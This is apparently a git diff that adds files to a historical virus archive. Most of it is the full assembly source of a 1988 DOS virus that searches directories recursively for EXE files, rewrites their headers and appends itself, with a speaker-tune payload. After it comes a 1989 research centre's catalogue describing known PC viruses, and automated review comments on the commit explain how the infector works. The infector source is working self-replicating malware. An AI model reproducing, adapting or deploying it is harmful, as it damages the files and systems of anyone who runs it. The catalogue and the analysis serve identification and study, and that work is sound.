+ +data_area ends + + org 100h ;Defined for .com file as virus must + ;be able to run on itself +start: call setup_data ;This is a near call therefore it's a + ;three byte instruction.It's purpose is + ;to catch correct data area address + ;even when virus is appended to the + ;infected .exe program +adjust equ offset pgm_start ;Known offset value +pgm_start label word ; + +virussize equ 2793 + + work: mov ax,ds ;Save old DS + push cs + pop ds ;Update to needed DS value + mov si,offset buffer.DS_save ;Put old DS in a quiet place + sub si,adjust + add si,bx + mov [si],ax + + mov si,offset buffer.ES_save ;Save it because Get DTA side effects + sub si,adjust + add si,bx + mov ax,es + mov [si],ax + push cs ;Imperative because DI usage + pop es + + push bx ;It's imperative to always keep + ;this value unchanged + mov ax,2f00h ;Get DTA function call + int 21h + + mov cx,bx ;save address found + pop bx + mov si,offset buffer.pointer1 + sub si,adjust + add si,bx + mov [si],cx + add si,2 ;Locate the segment immediately above + mov ax,es + mov [si],ax + push cs + pop es + + mov di,offset buffer.buffer1 ;adjust for first search + inc di ;Jump over the '\' + sub di,adjust + add di,bx + mov dx,0000h + push bx + call search_exe + pop bx + mov si,offset buffer.where_from_flag + sub si,adjust + add si,bx + cmp word ptr [si],0000h + jnz infected_run + int 020H + +infected_run: + mov si,offset buffer.pointer1 + sub si,adjust + add si,bx + mov dx,[si] + push ds + mov ax,[si+2] + mov ds,ax + push bx + mov ax,1a00h + int 21h + pop bx + pop ds ;Restore original DTA + + mov si,offset buffer.ES_save + sub si,adjust + add si,bx + mov ax,[si] + mov es,ax ;Restore ES + + ;Here you can do whatever you want + + push bx + call mary_proc + pop bx + + + + mov si,offset buffer.IP_save + sub si,adjust + add si,bx + mov ax,[si] + mov dx,[si+2] + mov si,offset buffer.far_push ;Restore original code + sub si,adjust ;segment + add si,bx + mov cx,[si] + push ax + mov ax,cs + sub ax,cx + mov di,ax ;For 
stack + add dx,ax + pop ax + + mov si,offset buffer.SS_save + sub si,adjust ;Restore stack segment + add si,bx + mov cx,word ptr [si] + add cx,di + + push es + pop ds + + cli + mov ss,cx + sti + + + push dx + push ax + retf + + +search_exe PROC + + push si + push dx + call transfer_filespec ;transfer filename in another + ;working area + call find_first ;try to find a first match + jc not_here ;first match not found + call try_to_infect ;if found try to infect + ;infected != 0 if success + mov si,offset buffer.infected + sub si,adjust + add si,bx + test word ptr [si],0ffffh + jz try_next + jmp quiet_exit + +try_next: + call find_next ;If infection was not succesful + ;try once more + jc not_here + + call try_to_infect ;If match found try to infect + mov si,offset buffer.infected ;again + sub si,adjust + add si,bx + test word ptr [si],0ffffh + jz try_next + + jmp quiet_exit ;quiet exit simply jumps + ;to a return instruction +not_here: + pop dx ;If first searches are + push dx ;unsuccesful try a '*.*' match + call search_all + call find_first + jnc attribute_test ;i.e. expect probably to + ;find a subdirectory +quiet_exit: + pop dx + pop si + ret + +attribute_test: + mov si,dx ;offset of DTA + test byte ptr [si+015h],010h ;where attribute byte is to + ;be found.Try first with + ;subdirectory attribute + jne dir_found ;subdirectory found +more_tries: + call find_next ;Since the search was initiated + ;with '*.*' if this is not a + ;directory try to found one + jc quiet_exit ;No sense to search more + + test byte ptr [si+015h],010h + jz more_tries ;Search to the end +dir_found: + cmp byte ptr [si+01Eh],02Eh ;Compare with the subdirectory + ;mark '.' 
+ jz more_tries ;looking for files no + ;subdirectories + + call dta_compute ;Valid entry, now set some DTA + ;and continue to search + push ax + mov ah,01Ah ;Set DTA function call + int 021h + pop ax + push si + mov si,offset buffer.infected + sub si,adjust + add si,bx + test word ptr [si],0ffffh + pop si + jnz quiet_exit + + jmp more_tries + + +search_exe ENDP + +dta_compute PROC + + push di ;Save some registers + push si + push ax + push bx + cld ;Up count for SI,DI pair + mov si,dx ;DTA address to SI + add si,01EH ;and add subdirectory + ;name offset + +store_loop: + lodsb + stosb + or al,al + jne store_loop ;store loop + + std + stosb + mov al,05Ch ;Put in place the path name + ;constructor + + stosb + add di,2 ;Adjust di for new searches + call search_exe ; + ;a heavily recursion + ; + pop bx ;some cleanup and exit + ; + pop ax + pop si + pop di + ret + +dta_compute ENDP + +try_to_infect PROC + + push ax + push bx + push cx + push dx + push si + push di + + push es + push bx + mov ax,2f00h ;Get DTA function call + int 21h + mov ax,bx + pop bx + mov si,offset buffer.pointer3 + sub si,adjust + add si,bx + mov [si],ax ;Offset saved + add si,2 + mov ax,es + mov [si],ax + pop es ;Segment located just above + + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + push bx + mov ax,1a00h + int 21h ;Set DTA function call + pop bx ;It's very important to + ;save BX in all calls + + mov di,offset buffer.new_area + mov si,offset buffer.buffer1 + sub di,adjust + sub si,adjust + add di,bx + add si,bx + + cld ;Move previously found path- + ;name or filename to new + ;data area +move_path: + lodsb + stosb + or al,al + jnz move_path + std ;adjust DI to recieve + mov al,'\' ;filename. + mov cx,0040h + std ;Search backward + repne scasb + + mov si,offset buffer.pointer3 + sub si,adjust + add si,bx + mov ax,[si] + mov si,ax + add di,2 + +o_kay: + add si,001eh ;The beginning of the + ;filename... 
+ cld ;Now move name + +move_fnm: + lodsb + stosb + or al,al + jnz move_fnm + + push dx + push bx + mov dx,offset buffer.new_area + sub dx,adjust + add dx,bx + mov ax,3d02h ;Open file with handle + ;for read/write + int 21h + pop bx + pop dx + jnc go_ahead ;In case file cannot be opened + jmp error_exit + +go_ahead: + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov [si],ax ;Save handle + + push bx + mov bx,ax ;Prepare for lseek + push dx + mov cx,0000h ;Look at the end of the file + mov dx,0000h ;Offset of -12 from the end + ;of the file + mov ax,4202h ;Lseek function call + int 21h + mov cx,dx + pop dx + pop bx + jnc compute_length + jmp close_error + +compute_length: + + sub ax,000ch + sbb cx,0000h ;Exact position + + +save_offset: ; + mov si,offset buffer.pointer5 + sub si,adjust + add si,bx + mov [si],ax + add si,2 + mov [si],cx + + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + mov dx,ax + mov ax,4200h ;From beginning of file + int 21h ;Lseek function call + pop dx + pop bx + jnc set_buffer + jmp close_error + +set_buffer: + push bx + push dx + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] ;Load handle + mov cx,000ch + mov ax,3f00h + int 21h ;Read function call + pop dx + pop bx + jnc read_ok + jmp close_error + +read_ok: + mov si,offset buffer.virus_stamp + mov di,offset buffer.new_data + sub si,adjust + sub di,adjust + add si,bx + add di,bx + mov cx,12 ;Length of strings to + ;compare + repe cmpsb + pushf + mov si,offset buffer.infected + sub si,adjust + add si,bx + mov word ptr [si],0000h + popf + jnz infect_it + +close_error: + mov si,offset buffer.handle + sub si,adjust + add si,bx + push bx + mov bx,[si] + mov ax,3e00h ;Close file function call + int 21h + pop bx + jmp error_exit + +infect_it: + mov si,offset buffer.infected + sub si,adjust + add si,bx + mov word ptr [si],7777h + + mov si,offset 
buffer.where_from_flag + sub si,adjust + add si,bx + mov ax,[si] + sub si,2 + mov [si],ax ;This code effectively moves + ;where_from_flag into help_flag + + add si,2 + mov [si],5a5ah ;Ready to infect + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + xor cx,cx + xor dx,dx + mov ax,4200h ;From beginning of file + int 21h ;Lseek function call + pop dx + pop bx + jnc set_new_data + jmp append_ok + +set_new_data: + push bx + push dx + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] ;Load handle + mov cx,001bh ;Read formatted exe header + mov ax,3f00h + int 21h ;Read function call + pop dx + pop bx + jnc read_header + jmp append_ok + +read_header: + nop ;some code to modify header + ; + + mov si,offset buffer.pointer5 + sub si,adjust + add si,bx + mov ax,[si] + add si,2 + add ax,0ch + adc word ptr [si],0000h + sub si,2 + mov [si],ax ;This code restores original + ;filelength + + mov si,offset buffer.new_data + sub si,adjust + add si,bx + mov ax,[si] + cmp ax,5a4dh ;check for valid exe file + jz valid_exe + jmp append_ok + +valid_exe: + mov ax,[si+8] ;Load module size + xor dx,dx + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 ;Multiply by 16 + + push ax + push dx ;Adjust new size + push cx + mov dx,virussize-896+64 + push dx + mov cx,0009h + shr dx,cl + add word ptr [si+4],dx + pop dx + and dx,01ffh + add dx,word ptr [si+2] + cmp dx,512 + jl adjust_okay + sub dx,512 + inc word ptr [si+4] +adjust_okay: + mov word ptr [si+2],dx + pop cx + pop dx + pop ax + + + push si ;This SI is very useful so save it + + mov si,offset buffer.pointer5 + sub si,adjust + add si,bx + sub [si],ax + mov ax,[si] + sbb [si+2],dx + mov dx,[si+2] ;the byte size of the load module + + + pop si + push ax + push dx + mov ax,[si+14h] + mov dx,[si+16h] ;Get CS:IP value + mov cx,[si+0eh] ;Get SS value + push si + mov si,offset 
buffer.IP_save + sub si,adjust + add si,bx + xchg [si],ax + xchg [si+2],dx + mov si,offset buffer.SS_save + sub si,adjust + add si,bx + xchg [si],cx + mov si,offset buffer.ip_old + sub si,adjust + add si,bx + mov [si],ax + mov [si+2],dx + mov si,offset buffer.ss_old + sub si,adjust + add si,bx + mov [si],cx + pop si + pop dx + pop ax + + push ax + push dx + + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 ;Multiply by 16 + + mov cx,0008h + shl dx,cl + mov cx,0004h + shr ax,cl ;A very obscure algorithm to make + ;a segment:offset pair + mov [si+14h],ax + mov [si+16h],dx ;Infected values + + push si + mov si,offset buffer.far_push + sub si,adjust + add si,bx + xchg [si],dx + mov word ptr [si+2],dx + pop si + + pop dx + pop ax + add ax,virussize ; + adc dx,0000h + + mov cx,0003h +mul_loop: + + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 ;Multiply by 4096 + loop mul_loop + + or ax,ax + jz exact_value + inc dx +exact_value: + mov [si+0eh],dx ;Infected stack segment + + ;Write back infected header + push si + push bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + mov ax,5700h ;Get time function + int 21h + pop bx + pop si + jnc correct_time + jmp append_ok1 + +correct_time: + push cx + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + xor cx,cx + xor dx,dx + mov ax,4200h ;From beginning of file + int 21h ;Lseek function call + pop dx + pop bx + pop cx + jnc continue_infection + jmp append_ok1 + +continue_infection: + + push cx + push dx + push bx + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] ;Load handle + mov cx,001bh ;Write infected exe header + mov ax,4000h + int 21h ;Write function call + pop bx + pop dx + pop cx + jnc glue_virus + jmp append_ok1 + +glue_virus: + + push cx + push bx + push dx + mov si,offset buffer.handle + sub 
si,adjust + add si,bx + mov bx,[si] + xor cx,cx + xor dx,dx + mov ax,4202h ;From the end of file + int 21h ;Lseek function call + pop dx + pop bx + pop cx + jnc write_data + jmp append_ok1 + +write_data: + + mov si,offset buffer.handle + sub si,adjust + add si,bx + + push dx + push cx + + mov dx,bx + sub dx,3 ;The starting three byte + ;call instruction + push es + push bx + push dx + push si + mov ax,2f00h + int 21h + pop si + pop dx + + push es + push bx + + push si + mov ax,1a00h + int 21h + pop si + + + mov bx,[si] ;Load handle + mov cx,virussize-896+64 ;Length of virus obtained + mov ax,4000h ;with dir + int 21h + lahf ;Write function call + + pop bx + pop es + + push ds + push es + pop ds + mov dx,bx + push ax + mov ax,1a00h + int 21h + pop ax + + pop ds + pop bx + pop es + + pop cx + pop dx + + sahf + jnc put_stamp ;Error or not file + jmp append_ok1 ;is closed + +put_stamp: + push bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + mov ax,5701h ;Set time function + int 21h + pop bx + +append_ok1: + + mov si,offset buffer.ip_old ;Restore previous CS:IP values + sub si,adjust + add si,bx + mov ax,[si] + mov dx,[si+2] + mov si,offset buffer.IP_save + sub si,adjust + add si,bx + mov [si],ax + mov [si+2],dx + + mov si,offset buffer.save_push + sub si,adjust + add si,bx + mov ax,[si] + mov word ptr [si-2],ax + + mov si,offset buffer.ss_old + sub si,adjust + add si,bx + mov ax,[si] + mov si,offset buffer.SS_save + sub si,adjust + add si,bx + mov word ptr [si],ax + + +append_ok: + mov si,offset buffer.help_flag + sub si,adjust + add si,bx + mov ax,[si] + add si,2 + mov [si],ax ;This code effectively moves + ;help_flag into where_from_flag + + + jmp close_error ; + +error_exit: + mov si,offset buffer.pointer3 + sub si,adjust + add si,bx + mov dx,[si] ;Restore original DTA + add si,2 + mov ax,[si] + push ds + mov ds,ax + mov ax,1a00h ;Set DTA function call + int 21h + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + ret + 
+try_to_infect ENDP + +transfer_filespec PROC + + push si + mov si,offset buffer.filematch ;Transfer name to the working + ;area + sub si,adjust + add si,bx + call byte_move + pop si + ret + +transfer_filespec ENDP + +search_all PROC + + push si + mov si,offset buffer.matchall ;This is the '*.*' filename + sub si,adjust + add si,bx + call byte_move + pop si + ret + +search_all ENDP + +byte_move PROC + + push ax + push di + + cld + +move_loop: + lodsb + stosb + or al,al ;The string to move is ASCIIZ + jne move_loop + pop di + pop ax + ret + +byte_move ENDP + +find_first PROC + + push cx + push bx + cmp dx,0000h + jnbe over_set + mov dx,offset buffer.buffer2 ;Set Data Transfer Area + sub dx,adjust ;or Disk Transfer area + add dx,bx ; +over_set: + add dx,02Bh + mov cx,00010h ;Attribute byte for + ;directory search + mov ah,01ah + int 021h ;Set DTA function call + + pop bx + push bx + push dx + mov dx,offset buffer.buffer1 + sub dx,adjust + add dx,bx + mov ah,04eh ;find first + ;function call + int 021h + pop dx + pop bx + pop cx + ret + +find_first ENDP + +find_next PROC + + push cx + push bx + push dx + mov dx,offset buffer.buffer1 + sub dx,adjust + add dx,bx + mov cx,00010h + mov ah,04fh ;Find next function call + int 021h + pop dx + pop bx + pop cx + ret + +find_next ENDP + +delay PROC + + push ax + push bx + push cx + push dx + mov ah,2ch ;Read current time + int 21h + + mov ah,ch + add al,cl + add bh,dh + add bl,dl + + cmp bl,100 + jb secs + sub bl,100 + inc bh +secs: cmp bh,60 + jb mins + sub bh,60 + inc al +mins: cmp al,60 + jb hours + sub al,60 + inc ah +hours: cmp ah,24 + jne tcheck + sub ah,ah + +tcheck: push ax + mov ah,2ch + int 21h + + pop ax + cmp cx,ax + ja tdquit + jb tcheck + cmp dx,bx + jb tcheck + +tdquit: pop dx + pop cx + pop bx + pop ax + ret + +delay ENDP + +sound PROC + + push ax + push cx + push dx + push di + + mov al,0b6h + out 43h,al + mov dx,14h + mov ax,533h*896 + div di + out 42h,al + mov al,ah + out 42h,al + in al,61h + mov ah,al + or 
al,3 + out 61h,al + mov al,cl + call delay + mov al,ah + out 61h,al + pop di + pop dx + pop cx + pop ax + ret + +sound ENDP + +music_play PROC + + push bx + push cx + push di + push si + push bp + +freq: + + mov di,[si] + cmp di,0ffffh + je end_play + mov bl,ds:[bp] + sub cl,cl + sub bh,bh + call sound + add si,2 + inc bp + jnz freq + +end_play: + pop bp + pop si + pop di + pop cx + pop bx + ret + +music_play ENDP + +mary_proc PROC + + push bx + push bp + + mov si,offset mary_freq + mov bp,offset mary_time + sub si,adjust + sub bp,adjust + add si,bx + add bp,bx + call music_play + + pop bp + pop bx + ret + +mary_proc ENDP + +mary_freq dw 262,262,293,329,262,329,293,196 + dw 262,262,293,329,262,262 + dw 262,262,293,329,349,329,293,262 + dw 246,196,220,246,262,262 + dw 220,246,220,174,220,246,262,220 + dw 196,220,196,174,164,174,196 + dw 220,246,220,174,220,246,262,220 + dw 196,262,246,293,262,262,0ffffh + + +mary_time db 8 dup(25) + db 4 dup(25), 50, 50 + db 8 dup(25) + db 4 dup(25), 50, 50 + db 26, 25, 26, 5 dup(25) + db 26, 25, 26, 3 dup(25), 30 + db 26, 25, 26, 4 dup(25), 30 + db 4 dup(25), 50, 50 + + + +setup_data: + cli + pop bx ;This will catch instruction pointer + push bx + sti ;value and after that restore stack + ret ;pointer value + + +buffer data_area <> ;Reseve data_area space + + + END start \ No newline at end of file diff --git a/textfiles.com/virus/european.txt b/textfiles.com/virus/european.txt new file mode 100644 index 00000000..e6733972 --- /dev/null +++ b/textfiles.com/virus/european.txt 
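Review bot: the enigma.asm hunk lands in the archive with no description beyond the three-line banner ("Good luck! Vladimir Botchev, CICT-BAS, december 1988"), so a short header or sidecar note stating what the sample is should accompany it; the visible code makes that straightforward to write. It is a non-resident appending EXE infector: it searches `*.exe` by extension only (`filematch db '*.exe',00h`) and recurses into subdirectories via `dta_compute` (commented "a heavily recursion"), opens each candidate read/write (`mov ax,3d02h`) before it has checked for the `MZ` signature (`cmp ax,5a4dh`), uses the 12-byte string `virus_stamp` read from the last `0Ch` bytes of the file as its already-infected marker, rewrites the 1Bh-byte EXE header (CS:IP, SS, load-module size) and restores the original timestamp around the write (`5700h` / `5701h`). The "whatever you want" payload slot only calls `mary_proc`, which plays `mary_freq`/`mary_time` through the PC speaker (ports 42h/43h/61h). One caveat worth recording for anyone measuring samples: `virussize equ 2793` is a hand-entered constant (the comment says "Length of virus obtained with dir"), and the bytes actually appended are `virussize-896+64`, i.e. 1961, so the increase in file length of an infected EXE is 1961 bytes plus header rounding, not 2793, and the header arithmetic that positions the new entry point is only correct for an image of exactly that size.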
@@ -0,0 +1,369 @@ + +Please find enclosed a list of known viruses in the UK prepared by +Joe Hirst of the BCVRC, he is happy that it be distributed as widely +as possible. + +Of great interest is the new Fu Manchu variant of the Israeli virus, +a virus with a slightly embarassing manipulation task! + +Ps. Joe doesn't have a mail box to date but I will relay any requests, +comments or information you pass on. + +D.Ferbrache +European co-ordinator +Comp.Virus + + IMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM; + : Joe Hirst British Computer Virus Research Centre : + : 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England : + : Telephone: Domestic 0273-26105, International +44-273-26105 : + : : + : List of known PC viruses : + : : + : This list is intended to give enough information to identify a virus : + : or a variant form of a virus. It is not intended by itself to supply : + : enough information for a programmer to deal with a virus. If any virus : + : is found which does not exactly match any of the following descriptions : + : the Centre requests that a copy of the virus be sent to us, or to a : + : local researcher known to be in contact with us. : + HMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM< + + 1. 405 + Parasitic virus - overwriting + +Type description: + Virus occurs overwriting the first 405 bytes of a COM file. The virus + will attempt to infect one COM file on a different disk to the current + one. If the length of the file to be infected is less than 405 bytes, + the length will be increased to 405. Due to mistakes in the code it is + not able to infect other than in the current directory, nor is it able + to recognise an infected file. + + ----------- + + 2. Brain + Boot virus - floppy only + +Type description: + This virus consists of a boot sector and three clusters (6 sectors) + marked as bad in the FAT. 
The first of these sectors contains the + original boot sector, and the rest contain the rest of the virus. It + only infects 360K floppies, and it occupies 7K of memory. It creates a + label on an infected disk of ' (c) Brain '. There are a number of + unused character strings which can be used to identify it: + + Offset 0010H: + ' Welcome to the Dungeon ' + ' (c) 1986 Basit & Amjad (pvt) Lt' + 'd. BRAIN COMPUTER SERVICES..730 NI' + 'ZAM BLOCK ALLAMA IQBAL TOWN LAHOR' + 'E-PAKISTAN..PHONE :430791,443248,280530. ' + ' Beware of this VIRUS.....Contact us for vaccin' + 'ation............... $#@%$@!! ' + Offset 0202H + '(c) 1986 Basit & Amjads (pvt) Ltd ' + Offset 0355H + ' (c) 1986 Basit & Amjads (pvt) Ltd' + Offset 04A6H + ' (c) Brain $' + +Variations: + All the variations we have so far seen have only involved changes to + these character strings. + + (1) Offset 0010H: + 'Welcome to the Dungeon (c) 1986 D.C.L', 17H, '&' + ' Amjads (pvt) Ltd VIRUS_SHOE RECORD v9.0 ' + 'Dedicated to the dynamic memories of millions of' + ' virus who are no longer with us today - Thanks ' + 'GOODNESS!! BEWARE OF THE er..VIRUS : \thi' + 's program is catching program follows after' + ' these messeges..... $#@%$@!! ' + Offset 0202H + '(c) 1986 Brain & Amjads (pvt) Ltd ' + Offset 0355H + ' (c) 1986 Brain & Amjads (pvt) Ltd' + Offset 04A6H + ' (c) ashar $' + (2) As variation 1 except 'D.C.L' is changed to 'Brain' in string at offset + 0010H + (3) As variation 2 except 'Brain' is changed to 'Jork ' in string at offset + 0202H + + ----------- + + 3. Cascade - AKA 1701, 1704 + Parasitic virus - resident + +Type description: + The virus occurs attached to the end of a COM file. COM files increase + in length by 1701 bytes. The first three bytes of the program are + stored in the virus, and replaced by a branch to the beginning of the + virus. 
The virus is encrypted (apart from the first 35 bytes) using an + algorithm that includes the length of the host program, so every sample + looks different. It becomes memory-resident when the first infected + program is run, and it will then infect every COM file run (even if the + file has an EXE extension). If the system date is between October and + December 1988 the cascade display will be activated at random + intervals. The virus tests the BIOS for the string 'COPR. IBM', and + will not infect if it finds this - however there are errors in the code + which prevent it from working. Because recognition depends on the + length of the virus, it will infect programs already infected by + variants with different lengths. + +Variations: + (1) COM files increase in length by 1704 bytes. The only differences are + the removal of a conditional jump (which would never have been taken), + and some necessary segment overrides on the BIOS tests missing in the + previous version. There is still a mistake preventing an IBM machine + from being recognised. + + ----------- + + 4. Datacrime - AKA 1168 + Parasitic virus - non-resident + +Type description: + The virus occurs attached to the end of a COM file. COM files increase + in length by 1168 bytes. The first three bytes of the program are + stored in the virus, and replaced by a branch to the beginning of the + virus. The virus will search through full directory structure of the + disks (in the order C, D, A, B) for a COM file other than COMMAND.COM. + It will also ignore any COM file if the 7th letter of the name is a D. + If the date is after 12 October (any year) it will display the message: + 'DATACRIME VIRUS' + 'RELEASED: 1 MARCH 1989' + and do a low level format on track zero, all heads, of the hard disk. + Due to mistakes in the code the system is almost certain to crash the + first time the critical error handler is invoked after the virus + terminates. + + ----------- + + 5. 
Dbase [report only - no sample] + Parasitic virus - resident + +Type description: + Infects COM and EXE files. Transposes random bytes of any open .DBF + file, keeping a record of which bytes in a hidden file (BUG.DAT) in the + same directory. The virus restores these bytes if the file is read. + If the BUG.DAT file is 90 days old or more the FAT and root directory + are overwritten. + + ----------- + + 6. Den Zuk - AKA Search [report only - no sample] + Boot virus - floppy only + +Type description: + Graphics display of 'DEN ZUK', together with the AT&T logo, slides in + from the sides of the screen on bootup. After five such bootups the + disk is trashed - no details of how. + + ----------- + + 7. Fu Manchu + Parasitic virus - resident + +Type description: + The virus occurs attached to the beginning of a COM file, or the end of + an EXE file. It is a rewritten version of the Jerusalem virus, and + most of what is said for that virus applies here with the following + changes: + + a. The code to delete programs, slow down the machine, and display + the black 'window' has been removed, as has the dead area at + the end of the virus and some sections of unused code. + b. The marker is now 'rEMHOr' (six bytes), and the preceeding 'sU' + is now 'sAX' (Sax Rohmer - creator of Fu Manchu). + c. COM files now increase in length by 2086 bytes & EXE files 2080 + bytes. EXE files are now only infected once. + d. One in sixteen times on infection a timer is installed which + runs for a random number of half-hours (maximum 7.5 hours). At + the end of this time the message 'The world will hear from me + again!' is displayed in the centre of the screen and the + machine reboots. This message is also displayed every time + Ctrl-Alt-Del is pressed on an infected machine, but the virus + does not survive the reboot. + e. There is further code which activates on or after the first of + August 1989. 
This monitors the keyboard buffer, and makes + derogatory additions to the names of politicians (Thatcher, + Reagan, Botha & Waldheim), censors out two four-letter words, + and to 'Fu Manchu ' adds 'virus 3/10/88 - latest in the new fun + line!' All these additions go into the keyboard buffer, so + their effect is not restricted to the VDU. All messages are + encryted. + + ----------- + + 8. Italian - AKA Pingpong + Boot virus - DOS boot sector + +Type description: + This virus consists of a boot sector and 1 cluster (2 sectors used) + marked as bad in the first copy of the FAT. The first of these sectors + contains the rest of the virus, and the second contains the original + boot sector. It infects all disks which have at least two sectors per + cluster, and it occupies 2K of memory. It displays a single character + 'bouncing ball' which interacts with some characters on the screen. It + will not run on an 80286 or an 80386 machine. + + ----------- + + 9. Jerusalem - AKA 1813, Friday the 13th, PLO, Israeli + Parasitic virus - resident + +Type description: + The virus occurs attached to the beginning of a COM file, or the end of + an EXE file. A COM file also has the five-byte 'marker' attached to + the end. This marker is usually (but not always) 'MsDos', and is + preceeded in the virus by 'sU'. COM files increase in length by 1813 + bytes. EXE files usually increase by 1808 bytes, but the displacement + at which to write the virus is taken from the length in the EXE header + and not the actual length. This means that part or all of this 1808 + bytes may be overwritten on the end of the host program. It becomes + memory-resident when the first infected program is run, and it will + then infect every program run except COMMAND.COM. COM files are + infected once only, EXE files are re-infected each time they are run. 
+ After the system has been infected for thirty minutes an area of the + screen from row 5 column 5 to row 16 column 16 is scrolled up two lines + creating a black two line 'window'. From this point a time-wasting + loop is executed with each timer interrupt. If the system was infected + with a system date of Friday the thirteenth, every program run will be + deleted instead. This will continue irrespective of the system date + until the machine is rebooted. The end of the virus, from offset + 0600H, is rubbish and will vary from sample to sample. + +Variations: + (1) [report only - no sample] + This is almost certainly an earlier variant. The string 'sUMsDos' in + the type version is 'sURIV 3.00' in this version, the 30 minute delay + is here 30 seconds, and there is a bug in the program delete. + + (2) [report only - no sample] + This is probably the first version. Only COM files are infected, and + the target date is 1st April. When target date is reached, the trojan + element is triggered the first time an uninfected file is infected by + the memory-resident virus. This produces the message 'APRIL 1ST HA HA + HA YOU HAVE A VIRUS', and the machine locks. Identifying string is + 'sURIV 1.01'. + + (3) [report only - no sample] + As variation 2, but only infects EXE files. Trojan is triggered first + time an infected file is run on 1st April. Additionally, machine locks + one hour after infection if default date of 1-1-80 is used. Virus + infects file only once. Identifying string is 'sURIV 2.01'. + + ----------- + + 10. Lehigh [report only - no sample] + Parasitic virus - overwriting + +Type description: + Infects only COMMAND.COM, where it overwrites the stack space. If a + disk which contains an uninfected copy of COMMAND.COM is accessed, that + copy is also infected. 
A count of infections is kept within each copy + of the virus, and when this count reaches 4 every disk (including hard + disks) currently in the computer is trashed by overwriting the initial + tracks (boot sector & FAT). Infection changes the date and time of the + infected file. If a floppy with an uninfected COMMAND.COM is write- + protected, there will be a 'WRITE PROTECT ERROR' message from DOS. + + ----------- + + 11. New Zealand - AKA Stoned, Marijuana + Boot virus - master boot sector + +Type description: + This virus consists of a boot sector only. It infects all disks, and + it occupies 1K of memory. The original boot sector is held in track + zero, head one, sector three on a floppy disk, and track zero head + zero, sector two on a hard disk. The boot sector contains two + character strings: 'Your PC is now Stoned!' & 'LEGALISE MARIJUANA!'. + The first of these is only displayed one in eight times when booting + from an infected floppy, the second is unreferenced. + +Variations: + (1) Much of the code has been reorganised. The only significant change is + that the original boot sector is stored at track zero, head zero, + sector seven on a hard disk. The second string is not transfered when + infecting a hard disk. + + ----------- + + 12. Oropax - AKA Music virus [report only - no sample] + Parasitic virus - resident + +Type description: + Infects COM files, length increases by 2756-2806 bytes, so that total + length is divisible by 51. Becomes active (randomly) five minutes + after infection, playing three different tunes with a seven minute + interval. + + ----------- + + 13. Pentagon + Boot virus - floppy only + +Type description: + Virus is possibly an honorary term, at least for this sample, as all + attempts to run it have so far failed. The following describes what + would happen if it did work (as future samples might). + This virus consists of a boot sector and two files. 
The boot sector is + a normal PCDOS 3.20 boot sector with three changes: + 1. The OEM name 'IBM' has been changed to 'HAL'. + 2. The first part of the virus code overwrites 036H to 0C5H. + 3. 100H-122H has been overwritten by a character string. + The name of the first file is the hex character 0F9H. This file + contains the rest of the virus code followed by the original boot + sector. The name of the second file is PENTAGON.TXT. This file does + not appear to be used in any way or contain any meaningful data. Both + files are created without the aid of DOS, and the first file is + accessed by its stored absolute location. Four different sections of + the virus are separately encrypted: + 1. 004AH - 004BH, key 0ABCDH - load decryption key + 2. 0059H - 00C4H, key 0FCH - rest of virus code in boot sector. + 3. 0791H - 07DFH, key 0AAH - the file name and copyright message. + 4. 0800H - 09FFH, key 0FCH - the original boot sector. + The virus will survive a warm boot (Ctrl-Alt-Del). It only infects + 360K floppies, and it will look for and remove Brain from any disk that + it infects. It occupies 5K in memory. + + ----------- + + 14. Vienna - AKA 648, Austrian, Unesco + Parasitic virus - non-resident + +Type description: + The virus occurs attached to the end of a COM file. COM files increase + in length by 648 bytes. The first three bytes of the program are + stored in the virus, and replaced by a branch to the beginning of the + virus. The virus looks for, and infects, one COM file - either in the + current directory or in one of the directories on the PATH. One in + eight files 'infected' does not get a copy of the virus. Instead the + first five bytes of the program are replaced by a far jump to the BIOS + initialization routine. + +Variations: + (1) This is the version published in Ralf Burger's book 'Computer Viruses: + A High-Tech Disease'. 
An error has been introduced which disables the + virus's ability to search through the PATH, and the far jump has been + replaced by five spaces. + + ----------- + + 15. Yale - AKA Alameda, Merritt + Boot virus - floppy only + +Type description: + This virus consists of a boot sector only. It infects floppies in the + A-drive only and it occupies 1K of memory. The original boot sector is + held in track thirty-nine, head zero, sector eight. It hooks into INT + 9, and only infects when Ctrl-Alt-Del is pressed. It will not run on + an 80286 or an 80386 machine, although it will infect on such a + machine. It has been assembled using A86. It contains code to format + track thirty-nine, head zero, but this has been disabled. + + ----------- + + \ No newline at end of file diff --git a/textfiles.com/virus/eval.vir b/textfiles.com/virus/eval.vir new file mode 100644 index 00000000..fd4c1673 --- /dev/null +++ b/textfiles.com/virus/eval.vir 
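Review bot: the file ending here is committed without a final newline (the `\ No newline at end of file` marker follows the Yale entry), while the other files in this commit end with one; add the trailing newline so the archive is consistent and future diffs of this file stay clean. Leave the body itself as typed, including source typos such as "transfered" in the New Zealand variation, since the file is an archival copy rather than an edited text.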
